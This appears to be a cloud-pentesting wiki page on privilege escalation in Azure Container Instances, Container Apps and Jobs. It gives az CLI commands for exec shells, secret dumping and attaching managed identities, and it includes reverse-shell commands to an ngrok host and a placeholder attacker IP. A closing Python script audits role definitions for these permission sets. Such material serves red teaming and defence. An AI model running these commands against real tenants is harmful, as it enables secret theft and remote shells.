Az - Azure Container Instances, Apps & Jobs Privesc


Azure Container Instances, Apps & Jobs

For more information check:

Az - Container Instances, Apps & Jobs

ACI

Microsoft.ContainerInstance/containerGroups/read, Microsoft.ContainerInstance/containerGroups/containers/exec/action

These permissions allow a user to execute a command in a running container. This can be used to escalate privileges in the container if it has a managed identity attached. Of course, it is also possible to access the source code and any other sensitive information stored inside the container.

Getting a shell is as simple as:

bash
az container exec --name <container-name> --resource-group <res-group>  --exec-command '/bin/sh'

It is also possible to read the container's output with:

bash
az container attach --name <container-name> --resource-group <res-group>

Or get the logs with:

bash
az container logs --name <container-name> --resource-group <res-group>

Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

These permissions allow attaching a user-assigned managed identity to a container group. This is very useful for escalating privileges in the container.

To attach a user-assigned managed identity to a container group:

bash
az rest \
--method PATCH \
--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \
--body '{
"identity": {
"type": "UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-managed-identity-name>": {}
}
}
}' \
--headers "Content-Type=application/json"

Microsoft.Resources/subscriptions/resourcegroups/read, Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

These permissions allow creating or updating a container group with a user-assigned managed identity attached to it. This is very useful for escalating privileges in the container.

bash
az container create \
--resource-group <res-group> \
--name nginx2 \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-managed-identity-name>" \
--restart-policy OnFailure \
--os-type Linux \
--cpu 1 \
--memory 1.0

Moreover, it is also possible to update an existing container group by adding, for example, the --command-line argument with a reverse shell.

ACA

Microsoft.App/containerApps/read, Microsoft.App/managedEnvironments/read, microsoft.app/containerapps/revisions/replicas, Microsoft.App/containerApps/revisions/read, Microsoft.App/containerApps/getAuthToken/action

These permissions allow a user to get a shell in a running application container. This can be used to escalate privileges in the container if it has any managed identity attached. Of course, it is also possible to access the source code and any other sensitive information stored inside the container.

bash
az containerapp exec --name <app-name> --resource-group <res-group> --command "sh"
az containerapp debug --name <app-name> --resource-group <res-group>

Microsoft.App/containerApps/listSecrets/action

This permission allows retrieving the clear text of the secrets configured inside a container app. Note that secrets can be configured with the clear text or with a link to a key vault (in which case the app will have a managed identity assigned with access to the secrets).

bash
az containerapp secret list --name <app-name> --resource-group <res-group>
az containerapp secret show --name <app-name> --resource-group <res-group> --secret-name <secret-name>

Microsoft.App/containerApps/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

These permissions allow attaching a user-assigned managed identity to a container app. This is very useful for escalating privileges in the container. Performing this action from the az cli also requires the permission Microsoft.App/containerApps/listSecrets/action.

To attach a user-assigned managed identity to a container group:

bash
az containerapp identity assign -n <app-name> -g <res-group> --user-assigned myUserIdentityName

Microsoft.App/containerApps/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action

These permissions allow creating or updating an application container with a user-assigned managed identity attached to it. This is very useful for escalating privileges in the container.

bash
# Get environments
az containerapp env list --resource-group Resource_Group_1

# Create app in an environment
az containerapp create \
--name <app-name> \
--resource-group <res-group> \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--cpu 1 --memory 1.0 \
--user-assigned <user-assigned-identity-name> \
--min-replicas 1 \
--command "<reverse shell>"

tip

Note that with these permissions other configurations of the app can be modified, which could allow performing other privesc and post-exploitation attacks depending on the configuration of existing apps.

Jobs

Microsoft.App/jobs/read, Microsoft.App/jobs/write

Although jobs are not long-running like container apps, you can exploit the ability to override the job's command configuration when starting an execution. By crafting a custom job template (for example, replacing the default command with a reverse shell), you can gain shell access inside the container that runs the job.

bash
# Retrieve the current job configuration and save its template:
az containerapp job show --name <job-name> --resource-group <res-group> --output yaml > job-template.yaml

# Edit job-template.yaml to override the command with a reverse shell (or similar payload):
# For example, change the container’s command to:
#  - args:
#      - -c
#      - bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/18224 0>&1
#      command:
#      - /bin/bash
#      image: mcr.microsoft.com/azureml/minimal-ubuntu22.04-py39-cpu-inference:latest

# Update and wait until the job is triggered (or change the type to scheduled)
az containerapp job update --name <job-name> --resource-group <res-group> --yaml job-template.yaml

# Start a new job execution with the modified template:
az containerapp job start --name <job-name> --resource-group <res-group> --yaml job-template.yaml

Microsoft.App/jobs/read, Microsoft.App/jobs/listSecrets/action

If you have these permissions you can list all the secrets (first permission) inside a Job container and then read the values of the configured secrets.

bash
az containerapp job secret list --name <job-name> --resource-group <res-group>
az containerapp job secret show --name <job-name> --resource-group <res-group> --secret-name <secret-name>

Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/jobs/write

If you have permission to modify a job's configuration, you can attach a user-assigned managed identity. This identity might have additional privileges (for example, access to other resources or secrets) that can be abused to escalate privileges inside the container.

bash
az containerapp job update \
--name <job-name> \
--resource-group <res-group> \
--assign-identity <user-assigned-identity-id>

Microsoft.App/managedEnvironments/read, Microsoft.App/jobs/write, Microsoft.App/managedEnvironments/join/action, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

If you can create a new Container Apps Job (or update an existing one) and attach a managed identity, you can design the job to execute a payload that escalates privileges. For example, you could create a new job that not only runs a reverse shell but also uses the managed identity's credentials to request tokens or access other resources.

bash
az containerapp job create \
--name <new-job-name> \
--resource-group <res-group> \
--environment <environment-name> \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--user-assigned <user-assigned-identity-id> \
--trigger-type Schedule \
--cron-expression "*/1 * * * *" \
--replica-timeout 1800 \
--replica-retry-limit 0 \
--command "bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'"

tip

This command will throw an error if you don't have the Microsoft.App/jobs/read permission, although the Job will be created.

microsoft.app/jobs/start/action, microsoft.app/jobs/read

It looks like with these permissions it should be possible to start a job. This could be used to start a job with a reverse shell or any other malicious command without needing to modify the job's configuration.

I haven't managed to make it work, but according to the allowed parameters it should be possible.

Microsoft.ContainerInstance/containerGroups/restart/action

Allows restarting a specific container group within Azure Container Instances.

bash
az container restart --resource-group <resource-group> --name <container-instances>
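
The permission combinations in the headings above can be checked against role definitions to find roles that grant them. The following is an added example, not part of the original page: it evaluates each role's actions and notActions, including wildcards and case-insensitive matching, against those sets. The set names, role names and sample roles are constructed, and the input shape assumes the JSON returned by `az role definition list`.

```python
import re

# Risky permission sets, copied from the headings of this page.
ACI = "Microsoft.ContainerInstance/containerGroups"
APP = "Microsoft.App/containerApps"
JOB = "Microsoft.App/jobs"
ASSIGN = "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
RISKY_SETS = {
    "aci-exec": [f"{ACI}/read", f"{ACI}/containers/exec/action"],
    "aci-attach-identity": [f"{ACI}/write", ASSIGN],
    "aca-exec": [f"{APP}/read", "Microsoft.App/managedEnvironments/read",
                 "microsoft.app/containerapps/revisions/replicas",
                 f"{APP}/revisions/read", f"{APP}/getAuthToken/action"],
    "aca-list-secrets": [f"{APP}/listSecrets/action"],
    "aca-attach-identity": [f"{APP}/write", ASSIGN],
    "job-override-command": [f"{JOB}/read", f"{JOB}/write"],
    "job-list-secrets": [f"{JOB}/read", f"{JOB}/listSecrets/action"],
    "job-attach-identity": [f"{JOB}/write", ASSIGN],
}

def _matches(pattern, action):
    """Azure RBAC action patterns: '*' is a wildcard, comparison ignores case."""
    regex = re.escape(pattern).replace(r"\*", ".*")
    return re.fullmatch(regex, action, re.IGNORECASE) is not None

def grants(role, action):
    """True if any permissions block allows `action` and its notActions do not remove it."""
    for block in role.get("permissions", []):
        allowed = any(_matches(p, action) for p in block.get("actions", []))
        removed = any(_matches(p, action) for p in block.get("notActions", []))
        if allowed and not removed:
            return True
    return False

def audit(role):
    """Return the names of the risky sets this role definition fully grants."""
    return sorted(n for n, needed in RISKY_SETS.items()
                  if all(grants(role, a) for a in needed))

# Constructed sample roles, shaped like `az role definition list` output.
SAMPLE_ROLES = [
    {"roleName": "aci-operator", "permissions": [{
        "actions": [f"{ACI}/*"], "notActions": [f"{ACI}/write"]}]},
    {"roleName": "job-deployer", "permissions": [{
        "actions": ["microsoft.app/jobs/*", ASSIGN], "notActions": []}]},
]

if __name__ == "__main__":
    for role in SAMPLE_ROLES:
        print(role["roleName"], audit(role))
```

The check is per role definition; a principal holding several roles has the union of their permissions, so the actions of all of its roles should be merged into one definition before auditing.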
